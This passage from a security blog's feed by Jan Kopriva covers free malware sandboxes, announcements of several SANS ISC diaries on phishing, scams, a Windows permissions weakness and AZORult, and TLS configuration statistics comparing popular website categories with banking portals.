&lt;p&gt;Whether your work has anything to do with security monitoring, malware analysis, incident response, or just general IT administration, you’ve probably come across &lt;a href=&#34;https://www.virustotal.com/&#34;&gt;VirusTotal&lt;/a&gt;. It is an invaluable tool when it comes to identifying malicious code, however sometimes we need to dig a bit deeper than just getting a &amp;ldquo;detection score&amp;rdquo; for a potentially dangerous file. In such instances, we may turn to free online sandboxes (or paid or local ones, if we have access to them, but let’s assume we don’t), which can provide us with more detailed information about the behavior of our file by executing or opening it in a virtual environment and monitoring its activities.&lt;/p&gt;
&lt;p&gt;There have been many such tools over the years. But since some of the old ones are not working anymore (&lt;a href=&#34;https://malwr.com/&#34;&gt;malwr.com&lt;/a&gt; to name one), while others appeared only relatively recently, I thought it might be interesting to take a look at what free sandboxes and analytical platforms are available to us at the beginning of 2020 and what their features are.&lt;/p&gt;
&lt;p&gt;After going through all the free online sandboxes I could find, I picked out nine, which I believe are most useful, and summarized their features in the following table. I should mention that I intentionally didn’t put in it &amp;ldquo;specialized&amp;rdquo; sandboxes, such as &lt;a href=&#34;https://amaaas.com/&#34;&gt;AMAaaS&lt;/a&gt;, as I was mainly going for general-use platforms. Although the table is therefore far from being exhaustive, I think it may provide a useful quick reference to what you can get and where you can get it if you need to analyze (potentially) malicious files under specific conditions.&lt;/p&gt;
&lt;p&gt;It should be noted that at the time of writing, none of the free sandboxes mentioned bellow support private submissions. This means that any uploaded files may be accessible to other users and/or organizations and it would therefore be unwise to upload anything sensitive to any of the platforms.&lt;/p&gt;
&lt;p&gt;&lt;a href=&#34;https://untrustednetwork.net/images/2020/04-sandboxes/free-malware-analysis-sandboxes-overview-3-2020.png&#34;&gt;&lt;img src=&#34;https://untrustednetwork.net/images/2020/04-sandboxes/free-malware-analysis-sandboxes-overview-3-2020.png&#34; alt=&#34;Overview of free online malware analysis sandboxes – 3/2020&#34; style=&#34;width:700px; border:1px solid grey&#34;&gt;&lt;/a&gt;&lt;/p&gt;
</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        
        
        
        
          
            
              <category>Malware</category>
            
          
            
              <category>Sandbox</category>
            
          
            
              <category>VirusTotal</category>
            
          
        
        
          
            
              <category>News</category>
            
          
            
              <category>2020</category>
            
          
        
        
      </item>
      
      <item>
        <title>SANS ISC Diary - Secure vs. cleartext protocols – couple of interesting stats</title>
        <link>https://untrustednetwork.net/en/2020/03/02/sans-isc-diary-secure-vs.-cleartext-protocols-couple-of-interesting-stats/</link>
        <pubDate>Mon, 02 Mar 2020 06:55:00 +0100</pubDate>
        
        <atom:modified>Mon, 02 Mar 2020 06:55:00 +0100</atom:modified>
        <guid>https://untrustednetwork.net/en/2020/03/02/sans-isc-diary-secure-vs.-cleartext-protocols-couple-of-interesting-stats/</guid>
        <description>A Diary of mine was published today on the SANS Internet Storm Center. In this one, we delve into the support of HTTP and HTTPS among web servers on the internet, as well as support for Telnet and SSH, over the last six months.</description>
        <content:encoded>&lt;p&gt;A &lt;a href=&#34;https://isc.sans.edu/forums/diary/Secure+vs+cleartext+protocols+couple+of+interesting+stats/25854/&#34;&gt;Diary&lt;/a&gt; of mine was published today on the &lt;a href=&#34;https://isc.sans.edu/&#34;&gt;SANS Internet Storm Center&lt;/a&gt;. In this one, we delve into the support of HTTP and HTTPS among web servers on the internet, as well as support for Telnet and SSH, over the last six months.&lt;/p&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/isc/isc-diary.jpg&#34; alt=&#34;ISC diary&#34;&gt;
</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        <media:content url="https://untrustednetwork.netimages/isc.png" medium="image"><media:title type="html">featured image</media:title></media:content>
        
        
        
          
            
              <category>SANS</category>
            
          
            
              <category>TLS</category>
            
          
            
              <category>HTTP</category>
            
          
            
              <category>HTTPS</category>
            
          
            
              <category>Telnet</category>
            
          
            
              <category>SSH</category>
            
          
        
        
          
            
              <category>News</category>
            
          
            
              <category>2020</category>
            
          
        
        
          
            
              <category>SANS ISC Diary</category>
            
          
        
      </item>
      
      <item>
        <title>SANS ISC Diary - Quick look at a couple of current online scam campaigns</title>
        <link>https://untrustednetwork.net/en/2020/02/25/sans-isc-diary-quick-look-at-a-couple-of-current-online-scam-campaigns/</link>
        <pubDate>Tue, 25 Feb 2020 06:57:00 +0100</pubDate>
        
        <atom:modified>Tue, 25 Feb 2020 06:57:00 +0100</atom:modified>
        <guid>https://untrustednetwork.net/en/2020/02/25/sans-isc-diary-quick-look-at-a-couple-of-current-online-scam-campaigns/</guid>
        <description>A Diary of mine was published today on the SANS Internet Storm Center. In this one, we take a look at couple of online scam campaigns I came accross in the last weeks. A closer look at one of the landing pages used in the campaign, which was almost certainly authored by the FizzCore group, may be found here (in Czech).</description>
        <content:encoded>&lt;p&gt;A &lt;a href=&#34;https://isc.sans.edu/forums/diary/Quick+look+at+a+couple+of+current+online+scam+campaigns/25838/&#34;&gt;Diary&lt;/a&gt; of mine was published today on the &lt;a href=&#34;https://isc.sans.edu/&#34;&gt;SANS Internet Storm Center&lt;/a&gt;. In this one, we take a look at couple of online scam campaigns I came accross in the last weeks. A closer look at one of the landing pages used in the campaign, which was almost certainly authored by the FizzCore group, may be found &lt;a href=&#34;https://www.untrustednetwork.net/cs/2020/02/22/ct24_podvodna_stranka/&#34;&gt;here&lt;/a&gt; (in Czech).&lt;/p&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/isc/isc-diary.jpg&#34; alt=&#34;ISC diary&#34;&gt;
</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        <media:content url="https://untrustednetwork.netimages/isc.png" medium="image"><media:title type="html">featured image</media:title></media:content>
        
        
        
          
            
              <category>SANS</category>
            
          
            
              <category>Scam</category>
            
          
            
              <category>FizzCore</category>
            
          
        
        
          
            
              <category>News</category>
            
          
            
              <category>2020</category>
            
          
        
        
          
            
              <category>SANS ISC Diary</category>
            
          
        
      </item>
      
      <item>
        <title>SANS ISC Diary - Discovering contents of folders in Windows without permissions</title>
        <link>https://untrustednetwork.net/en/2020/02/18/sans-isc-diary-discovering-contents-of-folders-in-windows-without-permissions/</link>
        <pubDate>Tue, 18 Feb 2020 07:18:21 +0100</pubDate>
        
        <atom:modified>Tue, 18 Feb 2020 07:18:21 +0100</atom:modified>
        <guid>https://untrustednetwork.net/en/2020/02/18/sans-isc-diary-discovering-contents-of-folders-in-windows-without-permissions/</guid>
        <description>A Diary of mine was published today on the SANS Internet Storm Center. This one deals with a strange side effect of the way in which Windows deals with file permissions, which enables any user, regardless of permissions, to brute-force contents of any local folder.
UPDATE 20. 5. 2020: I put together a shor video demonstrating the weakness/vulnerability while preparing materials for SANSFIRE 2020. You may find it here.</description>
        <content:encoded>&lt;p&gt;A &lt;a href=&#34;https://isc.sans.edu/forums/diary/Discovering+contents+of+folders+in+Windows+without+permissions/25816/&#34;&gt;Diary&lt;/a&gt; of mine was published today on the &lt;a href=&#34;https://isc.sans.edu/&#34;&gt;SANS Internet Storm Center&lt;/a&gt;. This one deals with a strange side effect of the way in which Windows deals with file permissions, which enables any user, regardless of permissions, to brute-force contents of any local folder.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;UPDATE 20. 5. 2020: I put together a shor video demonstrating the weakness/vulnerability while preparing materials for &lt;a href=&#34;https://www.sans.org/event/sansfire-2020/&#34;&gt;SANSFIRE 2020&lt;/a&gt;. You may find it &lt;a href=&#34;https://www.youtube.com/watch?v=5yT-QFdKOqg&#34;&gt;here&lt;/a&gt;.&lt;/em&gt;&lt;/p&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/isc/isc-diary.jpg&#34; alt=&#34;ISC diary&#34;&gt;
</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        <media:content url="https://untrustednetwork.netimages/isc.png" medium="image"><media:title type="html">featured image</media:title></media:content>
        
        
        
          
            
              <category>SANS</category>
            
          
            
              <category>Microsoft</category>
            
          
            
              <category>Windows</category>
            
          
            
              <category>Vulnerability</category>
            
          
        
        
          
            
              <category>News</category>
            
          
            
              <category>2020</category>
            
          
        
        
          
            
              <category>SANS ISC Diary</category>
            
          
        
      </item>
      
      <item>
        <title>SANS ISC Diary - Current PayPal phishing campaign or &#39;give me all your personal information&#39;</title>
        <link>https://untrustednetwork.net/en/2020/02/10/sans-isc-diary-current-paypal-phishing-campaign-or-give-me-all-your-personal-information/</link>
        <pubDate>Mon, 10 Feb 2020 09:37:58 +0100</pubDate>
        
        <atom:modified>Mon, 10 Feb 2020 09:37:58 +0100</atom:modified>
        <guid>https://untrustednetwork.net/en/2020/02/10/sans-isc-diary-current-paypal-phishing-campaign-or-give-me-all-your-personal-information/</guid>
        <description>A Diary of mine was published today on the SANS Internet Storm Center. In this one we take a look at a current phishing campaign which shows quite well the current &amp;ldquo;let&amp;rsquo;s get all the users&#39; data&amp;rdquo; mentality of the attackers.</description>
        <content:encoded>&lt;p&gt;A &lt;a href=&#34;https://isc.sans.edu/forums/diary/Current+PayPal+phishing+campaign+or+give+me+all+your+personal+information/25786/&#34;&gt;Diary&lt;/a&gt; of mine was published today on the &lt;a href=&#34;https://isc.sans.edu/&#34;&gt;SANS Internet Storm Center&lt;/a&gt;. In this one we take a look at a current phishing campaign which shows quite well the current &amp;ldquo;let&amp;rsquo;s get all the users&#39; data&amp;rdquo; mentality of the attackers.&lt;/p&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/isc/isc-diary.jpg&#34; alt=&#34;ISC diary&#34;&gt;</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        <media:content url="https://untrustednetwork.netimages/isc.png" medium="image"><media:title type="html">featured image</media:title></media:content>
        
        
        
          
            
              <category>SANS</category>
            
          
            
              <category>Phishing</category>
            
          
            
              <category>PayPal</category>
            
          
        
        
          
            
              <category>News</category>
            
          
            
              <category>2020</category>
            
          
        
        
          
            
              <category>SANS ISC Diary</category>
            
          
        
      </item>
      
      <item>
        <title>SANS ISC Diary - Analysis of a triple-encrypted AZORult downloader</title>
        <link>https://untrustednetwork.net/en/2020/02/03/sans-isc-diary-analysis-of-a-triple-encrypted-azorult-downloader/</link>
        <pubDate>Mon, 03 Feb 2020 07:45:10 +0100</pubDate>
        
        <atom:modified>Mon, 03 Feb 2020 07:45:10 +0100</atom:modified>
        <guid>https://untrustednetwork.net/en/2020/02/03/sans-isc-diary-analysis-of-a-triple-encrypted-azorult-downloader/</guid>
        <description>A Diary of mine was published today on the SANS Internet Storm Center. In this one we take a look at analysis of an interesting malicious document which turned out to be AZORult downloader. What made it stand out - among its other aspects - were 3 layers of home-grown encryption&amp;hellip;
EDIT 04/02/2020: Tom from Threat Post liked the diary and wrote an article based on it - you may find it here.</description>
        <content:encoded>&lt;p&gt;A &lt;a href=&#34;https://isc.sans.edu/forums/diary/Analysis+of+a+tripleencrypted+AZORult+downloader/25768/&#34;&gt;Diary&lt;/a&gt; of mine was published today on the &lt;a href=&#34;https://isc.sans.edu/&#34;&gt;SANS Internet Storm Center&lt;/a&gt;. In this one we take a look at analysis of an interesting malicious document which turned out to be AZORult downloader. What made it stand out - among its other aspects - were 3 layers of home-grown encryption&amp;hellip;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;EDIT 04/02/2020: Tom from Threat Post liked the diary and wrote an article based on it - you may find it &lt;a href=&#34;https://threatpost.com/azorult-campaign-encryption-technique/152508/&#34;&gt;here&lt;/a&gt;.&lt;/em&gt;&lt;/p&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/isc/isc-diary.jpg&#34; alt=&#34;ISC diary&#34;&gt;</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        <media:content url="https://untrustednetwork.netimages/isc.png" medium="image"><media:title type="html">featured image</media:title></media:content>
        
        
        
          
            
              <category>SANS</category>
            
          
            
              <category>Malware</category>
            
          
            
              <category>Phishing</category>
            
          
            
              <category>AZORult</category>
            
          
            
              <category>Macro</category>
            
          
        
        
          
            
              <category>News</category>
            
          
            
              <category>2020</category>
            
          
        
        
          
            
              <category>SANS ISC Diary</category>
            
          
        
      </item>
      
      <item>
        <title>SANS ISC Diary - Picks of 2019 malware - the large, the small and the one full of null bytes</title>
        <link>https://untrustednetwork.net/en/2020/01/16/sans-isc-diary-picks-of-2019-malware-the-large-the-small-and-the-one-full-of-null-bytes/</link>
        <pubDate>Thu, 16 Jan 2020 07:52:08 +0100</pubDate>
        
        <atom:modified>Thu, 16 Jan 2020 07:52:08 +0100</atom:modified>
        <guid>https://untrustednetwork.net/en/2020/01/16/sans-isc-diary-picks-of-2019-malware-the-large-the-small-and-the-one-full-of-null-bytes/</guid>
        <description>A Diary of mine was published today on the SANS Internet Storm Center. In this one we take a look at what last year brought us, when it comes to malware delivered by e-mail, specifically at the smallest and largest malicious files I found in my e-mail quarantine.</description>
        <content:encoded>&lt;p&gt;A &lt;a href=&#34;https://isc.sans.edu/forums/diary/Picks+of+2019+malware+the+large+the+small+and+the+one+full+of+null+bytes/25718/&#34;&gt;Diary&lt;/a&gt; of mine was published today on the &lt;a href=&#34;https://isc.sans.edu/&#34;&gt;SANS Internet Storm Center&lt;/a&gt;. In this one we take a look at what last year brought us, when it comes to malware delivered by e-mail, specifically at the smallest and largest malicious files I found in my e-mail quarantine.&lt;/p&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/isc/isc-diary.jpg&#34; alt=&#34;ISC diary&#34;&gt;
</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        <media:content url="https://untrustednetwork.netimages/isc.png" medium="image"><media:title type="html">featured image</media:title></media:content>
        
        
        
          
            
              <category>SANS</category>
            
          
            
              <category>Malware</category>
            
          
            
              <category>Phishing</category>
            
          
            
              <category>Pony</category>
            
          
        
        
          
            
              <category>News</category>
            
          
            
              <category>2020</category>
            
          
        
        
          
            
              <category>SANS ISC Diary</category>
            
          
        
      </item>
      
      <item>
        <title>Most visited adult sites actually beat some e-banking portals when it comes to encryption</title>
        <link>https://untrustednetwork.net/en/2020/01/01/most-visited-adult-sites-actually-beat-some-e-banking-portals-when-it-comes-to-encryption/</link>
        <pubDate>Wed, 01 Jan 2020 12:09:20 +0100</pubDate>
        
        <atom:modified>Wed, 01 Jan 2020 12:09:20 +0100</atom:modified>
        <guid>https://untrustednetwork.net/en/2020/01/01/most-visited-adult-sites-actually-beat-some-e-banking-portals-when-it-comes-to-encryption/</guid>
        <description>After I finished the analysis of SSL/TLS configuration of almost 1400 internet banking portals (see the relevant ISC Diary, a question came to me. Internet banking portals should be among the best secured systems put online, yet not all of them made the mark when it came to encryption used to secure HTTP traffic. Would the situation be even worse for sites which are commonly assumed to lack proper security measures?</description>
        <content:encoded>&lt;p&gt;After I finished the analysis of SSL/TLS configuration of almost 1400 internet banking portals (see the relevant &lt;a href=&#34;https://untrustednetwork.net/en/2019/12/13/sans-isc-diary-internet-banking-sites-and-their-use-of-tls...-and-sslv3...-and-sslv2/&#34;&gt;ISC Diary&lt;/a&gt;, a question came to me. Internet banking portals should be among the best secured systems put online, yet not all of them made the mark when it came to encryption used to secure HTTP traffic. Would the situation be even worse for sites which are commonly assumed to lack proper security measures?&lt;/p&gt;
&lt;p&gt;Websites with adult content seemed to be the ideal starting place to determine this, so I tried to look for a list of the most popular ones. Contrary to my expectations, I wasn&amp;rsquo;t able to find any current list with more than &amp;ldquo;Top 10&amp;rdquo; or &amp;ldquo;Top 25&amp;rdquo; sites, so I turned to Alexa. Among other information, Alexa offers &amp;ldquo;Top 500 sites&amp;rdquo; lists for the following categories:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Adult&lt;/li&gt;
&lt;li&gt;Arts&lt;/li&gt;
&lt;li&gt;Business&lt;/li&gt;
&lt;li&gt;Computers&lt;/li&gt;
&lt;li&gt;Games&lt;/li&gt;
&lt;li&gt;Health&lt;/li&gt;
&lt;li&gt;Home&lt;/li&gt;
&lt;li&gt;Kids and Teens&lt;/li&gt;
&lt;li&gt;News&lt;/li&gt;
&lt;li&gt;Recreation&lt;/li&gt;
&lt;li&gt;Reference&lt;/li&gt;
&lt;li&gt;Regional&lt;/li&gt;
&lt;li&gt;Science&lt;/li&gt;
&lt;li&gt;Shopping&lt;/li&gt;
&lt;li&gt;Society&lt;/li&gt;
&lt;li&gt;Sports&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Unfortunately, without a paid account, one may only access first 50 sites of the Top 500 list for each category. Although I originally wanted our sample to be much larger, it was not to be&amp;hellip; But the limitation gave me an idea. Since one may access list of the top 50 sites in each category, why not scan all the 50 sites for each of the 16 categories? Of course, with such a small sample size, the results could not be considered anywhere near representative, but they might be interesting nonetheless.&lt;/p&gt;
&lt;p&gt;With the plan set, I put it into action on 25 December 2019. I used the same methodology as in the case of the banking portals - I conducted an Nmap scan using the &amp;ldquo;ssl-enum-ciphers&amp;rdquo; and &amp;ldquo;sslv2&amp;rdquo; scripts which enabled me to determine which SSL/TLS protocols were supported by the servers (except for TLSv1.3) as well as the weakest supported ciphersuite (once again, see the Diary for more details). In the end, the scans managed to gather information about 790 of the 800 domains (the 10 errors were mostly due to second level domains not having an A record set).&lt;/p&gt;
&lt;p&gt;In contrast to the case of internet banking portals, none of the servers in the &amp;ldquo;Top 50&amp;rdquo; lists supported SSLv2 (which 0.8% of tested internet banking servers did) or supported a ciphersuite marked with an F (as was the case with 0.29% of e-banking servers). So in this regard (and actually several others), even the 50 most visited adult sites were actually better configured than some of the internet banking portals.&lt;/p&gt;
&lt;p&gt;Apart from that, the results were a bit of a mixed bag, as you may see from the following table of results. I added the numbers for the internet banking sites as well, so you may judge the resulting grades for yourselves.&lt;br /&gt;
&lt;br&gt;&lt;br&gt;&lt;/p&gt;
&lt;table&gt;
    &lt;col width=&#34;150&#34;&gt;
    &lt;col width=&#34;80&#34;&gt;
    &lt;col width=&#34;80&#34;&gt;
    &lt;col width=&#34;80&#34;&gt;
    &lt;col width=&#34;80&#34;&gt;
    &lt;tr&gt;
        &lt;td&gt;&lt;b&gt;Category&lt;/b&gt;&lt;/td&gt;
        &lt;td&gt;&lt;b&gt;A&lt;/b&gt;&lt;/td&gt;
        &lt;td&gt;&lt;b&gt;C&lt;/b&gt;&lt;/td&gt;
        &lt;td&gt;&lt;b&gt;D&lt;/b&gt;&lt;/td&gt;
        &lt;td&gt;&lt;b&gt;F&lt;/b&gt;&lt;/td&gt;
    &lt;/tr&gt;
    &lt;tr&gt;
        &lt;td&gt;Business&lt;/td&gt;
        &lt;td&gt;78.72&lt;/td&gt;
        &lt;td&gt;17.02&lt;/td&gt;
        &lt;td&gt;4.26&lt;/td&gt;
        &lt;td&gt;0.00&lt;/td&gt;
    &lt;/tr&gt;
    &lt;tr&gt;
        &lt;td&gt;Health&lt;/td&gt;
        &lt;td&gt;75.00&lt;/td&gt;
        &lt;td&gt;25.00&lt;/td&gt;
        &lt;td&gt;0.00&lt;/td&gt;
        &lt;td&gt;0.00&lt;/td&gt;
    &lt;/tr&gt;
    &lt;tr&gt;
        &lt;td&gt;Reference&lt;/td&gt;
        &lt;td&gt;75.00&lt;/td&gt;
        &lt;td&gt;22.92&lt;/td&gt;
        &lt;td&gt;2.08&lt;/td&gt;
        &lt;td&gt;0.00&lt;/td&gt;
    &lt;/tr&gt;
    &lt;tr&gt;
        &lt;td&gt;Science&lt;/td&gt;
        &lt;td&gt;74.42&lt;/td&gt;
        &lt;td&gt;23.26&lt;/td&gt;
        &lt;td&gt;2.33&lt;/td&gt;
        &lt;td&gt;0.00&lt;/td&gt;
    &lt;/tr&gt;
    &lt;tr&gt;
        &lt;td&gt;Kids and Teens&lt;/td&gt;
        &lt;td&gt;73.91&lt;/td&gt;
        &lt;td&gt;21.74&lt;/td&gt;
        &lt;td&gt;4.35&lt;/td&gt;
        &lt;td&gt;0.00&lt;/td&gt;
    &lt;/tr&gt;
    &lt;tr&gt;
        &lt;td&gt;Regional&lt;/td&gt;
        &lt;td&gt;72.34&lt;/td&gt;
        &lt;td&gt;23.40&lt;/td&gt;
        &lt;td&gt;4.26&lt;/td&gt;
        &lt;td&gt;0.00&lt;/td&gt;
    &lt;/tr&gt;
    &lt;tr&gt;
        &lt;td&gt;Shopping&lt;/td&gt;
        &lt;td&gt;72.34&lt;/td&gt;
        &lt;td&gt;25.53&lt;/td&gt;
        &lt;td&gt;2.13&lt;/td&gt;
        &lt;td&gt;0.00&lt;/td&gt;
    &lt;/tr&gt;
    &lt;tr&gt;
        &lt;td&gt;Society&lt;/td&gt;
        &lt;td&gt;71.74&lt;/td&gt;
        &lt;td&gt;28.26&lt;/td&gt;
        &lt;td&gt;0.00&lt;/td&gt;
        &lt;td&gt;0.00&lt;/td&gt;
    &lt;/tr&gt;
    &lt;tr style=&#34;color: darkgrey;&#34;&gt;
        &lt;td&gt;Internet Banking&lt;/td&gt;
        &lt;td&gt;70.47&lt;/td&gt;
        &lt;td&gt;24.29&lt;/td&gt;
        &lt;td&gt;4.95&lt;/td&gt;
        &lt;td&gt;0.29&lt;/td&gt;
    &lt;/tr&gt;
    &lt;tr&gt;
        &lt;td&gt;Home&lt;/td&gt;
        &lt;td&gt;67.35&lt;/td&gt;
        &lt;td&gt;32.65&lt;/td&gt;
        &lt;td&gt;0.00&lt;/td&gt;
        &lt;td&gt;0.00&lt;/td&gt;
    &lt;/tr&gt;
    &lt;tr&gt;
        &lt;td&gt;News&lt;/td&gt;
        &lt;td&gt;67.35&lt;/td&gt;
        &lt;td&gt;32.65&lt;/td&gt;
        &lt;td&gt;0.00&lt;/td&gt;
        &lt;td&gt;0.00&lt;/td&gt;
    &lt;/tr&gt;
    &lt;tr&gt;
        &lt;td&gt;Recreation&lt;/td&gt;
        &lt;td&gt;66.67&lt;/td&gt;
        &lt;td&gt;31.11&lt;/td&gt;
        &lt;td&gt;2.22&lt;/td&gt;
        &lt;td&gt;0.00&lt;/td&gt;
    &lt;/tr&gt;
    &lt;tr&gt;
        &lt;td&gt;Adult&lt;/td&gt;
        &lt;td&gt;63.27&lt;/td&gt;
        &lt;td&gt;34.69&lt;/td&gt;
        &lt;td&gt;2.04&lt;/td&gt;
        &lt;td&gt;0.00&lt;/td&gt;
    &lt;/tr&gt;
    &lt;tr&gt;
        &lt;td&gt;Games&lt;/td&gt;
        &lt;td&gt;63.04&lt;/td&gt;
        &lt;td&gt;32.61&lt;/td&gt;
        &lt;td&gt;4.35&lt;/td&gt;
        &lt;td&gt;0.00&lt;/td&gt;
    &lt;/tr&gt;
    &lt;tr&gt;
        &lt;td&gt;Arts&lt;/td&gt;
        &lt;td&gt;61.70&lt;/td&gt;
        &lt;td&gt;34.04&lt;/td&gt;
        &lt;td&gt;4.26&lt;/td&gt;
        &lt;td&gt;0.00&lt;/td&gt;
    &lt;/tr&gt;
    &lt;tr&gt;
        &lt;td&gt;Sports&lt;/td&gt;
        &lt;td&gt;61.70&lt;/td&gt;
        &lt;td&gt;31.91&lt;/td&gt;
        &lt;td&gt;6.38&lt;/td&gt;
        &lt;td&gt;0.00&lt;/td&gt;
    &lt;/tr&gt;
    &lt;tr&gt;
        &lt;td&gt;Computers&lt;/td&gt;
        &lt;td&gt;52.00&lt;/td&gt;
        &lt;td&gt;46.00&lt;/td&gt;
        &lt;td&gt;2.00&lt;/td&gt;
        &lt;td&gt;0.00&lt;/td&gt;
    &lt;/tr&gt;
&lt;/table&gt;
&lt;br&gt;
&lt;p&gt;Besides the marks for different categories, protocol support was interesting as well. As was already mentioned, none of the tested sites supported SSLv2, however one further point that should be mentioned is that on average, more internet banking sites still supported SSLv3 than servers in any of the Alexa categories and less of banking sites supported TLSv1.2 than even the sites in the Adult category. Since the sample sizes varied widely between the analyses, this should be considered more of an interesting observation than anything else, but I think it does merit at least this small remark.&lt;br /&gt;
&lt;br&gt;&lt;br&gt;&lt;/p&gt;
&lt;table&gt;
    &lt;col width=&#34;150&#34;&gt;
    &lt;col width=&#34;80&#34;&gt;
    &lt;col width=&#34;80&#34;&gt;
    &lt;col width=&#34;80&#34;&gt;
    &lt;col width=&#34;80&#34;&gt;
    &lt;tr&gt;
        &lt;td&gt;&lt;b&gt;Category&lt;/b&gt;&lt;/td&gt;
        &lt;td&gt;&lt;b&gt;SSLv3&lt;/b&gt;&lt;/td&gt;
        &lt;td&gt;&lt;b&gt;TLSv1.0&lt;/b&gt;&lt;/td&gt;
        &lt;td&gt;&lt;b&gt;TLSv1.1&lt;/b&gt;&lt;/td&gt;
        &lt;td&gt;&lt;b&gt;TLSv1.2&lt;/b&gt;&lt;/td&gt;
    &lt;/tr&gt;
    &lt;tr&gt;
        &lt;td&gt;Computers&lt;/td&gt;
        &lt;td&gt;0.00&lt;/td&gt;
        &lt;td&gt;74.00&lt;/td&gt;
        &lt;td&gt;82.00&lt;/td&gt;
        &lt;td&gt;100.00&lt;/td&gt;
    &lt;/tr&gt;
    &lt;tr&gt;
        &lt;td&gt;Adult&lt;/td&gt;
        &lt;td&gt;2.00&lt;/td&gt;
        &lt;td&gt;68.00&lt;/td&gt;
        &lt;td&gt;80.00&lt;/td&gt;
        &lt;td&gt;98.00&lt;/td&gt;
    &lt;/tr&gt;
    &lt;tr&gt;
        &lt;td&gt;News&lt;/td&gt;
        &lt;td&gt;2.00&lt;/td&gt;
        &lt;td&gt;68.00&lt;/td&gt;
        &lt;td&gt;76.00&lt;/td&gt;
        &lt;td&gt;98.00&lt;/td&gt;
    &lt;/tr&gt;
    &lt;tr&gt;
        &lt;td&gt;Home&lt;/td&gt;
        &lt;td&gt;0.00&lt;/td&gt;
        &lt;td&gt;52.00&lt;/td&gt;
        &lt;td&gt;64.00&lt;/td&gt;
        &lt;td&gt;98.00&lt;/td&gt;
    &lt;/tr&gt;
    &lt;tr&gt;
        &lt;td&gt;Sports&lt;/td&gt;
        &lt;td&gt;0.00&lt;/td&gt;
        &lt;td&gt;68.75&lt;/td&gt;
        &lt;td&gt;85.42&lt;/td&gt;
        &lt;td&gt;97.92&lt;/td&gt;
    &lt;/tr&gt;
    &lt;tr style=&#34;color: darkgrey;&#34;&gt;
        &lt;td&gt;Internet Banking&lt;/td&gt;
        &lt;td&gt;3.49&lt;/td&gt;
        &lt;td&gt;47.64&lt;/td&gt;
        &lt;td&gt;57.75&lt;/td&gt;
        &lt;td&gt;96.65&lt;/td&gt;
    &lt;/tr&gt;
    &lt;tr&gt;
        &lt;td&gt;Reference&lt;/td&gt;
        &lt;td&gt;0.00&lt;/td&gt;
        &lt;td&gt;52.00&lt;/td&gt;
        &lt;td&gt;70.00&lt;/td&gt;
        &lt;td&gt;96.00&lt;/td&gt;
    &lt;/tr&gt;
    &lt;tr&gt;
        &lt;td&gt;Arts&lt;/td&gt;
        &lt;td&gt;2.04&lt;/td&gt;
        &lt;td&gt;63.27&lt;/td&gt;
        &lt;td&gt;71.43&lt;/td&gt;
        &lt;td&gt;95.92&lt;/td&gt;
    &lt;/tr&gt;
    &lt;tr&gt;
        &lt;td&gt;Society&lt;/td&gt;
        &lt;td&gt;2.08&lt;/td&gt;
        &lt;td&gt;47.92&lt;/td&gt;
        &lt;td&gt;58.33&lt;/td&gt;
        &lt;td&gt;95.83&lt;/td&gt;
    &lt;/tr&gt;
    &lt;tr&gt;
        &lt;td&gt;Health&lt;/td&gt;
        &lt;td&gt;0.00&lt;/td&gt;
        &lt;td&gt;46.94&lt;/td&gt;
        &lt;td&gt;67.35&lt;/td&gt;
        &lt;td&gt;93.88&lt;/td&gt;
    &lt;/tr&gt;
    &lt;tr&gt;
        &lt;td&gt;Shopping&lt;/td&gt;
        &lt;td&gt;0.00&lt;/td&gt;
        &lt;td&gt;36.73&lt;/td&gt;
        &lt;td&gt;63.27&lt;/td&gt;
        &lt;td&gt;93.88&lt;/td&gt;
    &lt;/tr&gt;
    &lt;tr&gt;
        &lt;td&gt;Business&lt;/td&gt;
        &lt;td&gt;2.04&lt;/td&gt;
        &lt;td&gt;36.73&lt;/td&gt;
        &lt;td&gt;53.06&lt;/td&gt;
        &lt;td&gt;93.88&lt;/td&gt;
    &lt;/tr&gt;
    &lt;tr&gt;
        &lt;td&gt;Kids and Teens&lt;/td&gt;
        &lt;td&gt;0.00&lt;/td&gt;
        &lt;td&gt;56.00&lt;/td&gt;
        &lt;td&gt;78.00&lt;/td&gt;
        &lt;td&gt;92.00&lt;/td&gt;
    &lt;/tr&gt;
    &lt;tr&gt;
        &lt;td&gt;Regional&lt;/td&gt;
        &lt;td&gt;0.00&lt;/td&gt;
        &lt;td&gt;56.00&lt;/td&gt;
        &lt;td&gt;78.00&lt;/td&gt;
        &lt;td&gt;92.00&lt;/td&gt;
    &lt;/tr&gt;
    &lt;tr&gt;
        &lt;td&gt;Recreation&lt;/td&gt;
        &lt;td&gt;2.04&lt;/td&gt;
        &lt;td&gt;42.86&lt;/td&gt;
        &lt;td&gt;63.27&lt;/td&gt;
        &lt;td&gt;91.84&lt;/td&gt;
    &lt;/tr&gt;
    &lt;tr&gt;
        &lt;td&gt;Games&lt;/td&gt;
        &lt;td&gt;2.00&lt;/td&gt;
        &lt;td&gt;66.00&lt;/td&gt;
        &lt;td&gt;82.00&lt;/td&gt;
        &lt;td&gt;90.00&lt;/td&gt;
    &lt;/tr&gt;
    &lt;tr&gt;
        &lt;td&gt;Science&lt;/td&gt;
        &lt;td&gt;0.00&lt;/td&gt;
        &lt;td&gt;44.90&lt;/td&gt;
        &lt;td&gt;67.35&lt;/td&gt;
        &lt;td&gt;87.76&lt;/td&gt;
    &lt;/tr&gt;
&lt;/table&gt;
&lt;br&gt;
&lt;p&gt;When it came to vulnerabilities, several servers in Society and Adult categories were found to be vulnerable to POODLE, couple in the Science category still supported the use of RC4 and quite a large number of sites in all categories supported ciphersuites vulnerable to SWEET32.&lt;br /&gt;
&lt;br&gt;&lt;br&gt;&lt;/p&gt;
&lt;table&gt;
